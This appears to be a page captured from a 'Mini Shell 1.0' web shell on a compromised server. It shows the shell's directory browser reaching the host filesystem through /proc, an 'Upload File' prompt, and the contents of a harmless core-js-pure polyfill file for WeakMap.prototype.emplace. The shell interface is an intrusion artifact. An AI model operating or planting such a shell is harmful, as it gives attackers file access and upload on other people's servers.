HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1991108/root/usr/share/node_modules/core-js-pure/modules/
Upload File :
Current File : //proc/1991108/root/usr/share/node_modules/core-js-pure/modules/esnext.weak-map.emplace.js
'use strict';
var $ = require('../internals/export');
var emplace = require('../internals/map-emplace');

// `WeakMap.prototype.emplace` method
// https://github.com/tc39/proposal-upsert
$({ target: 'WeakMap', proto: true, real: true, forced: true }, {
  emplace: emplace
});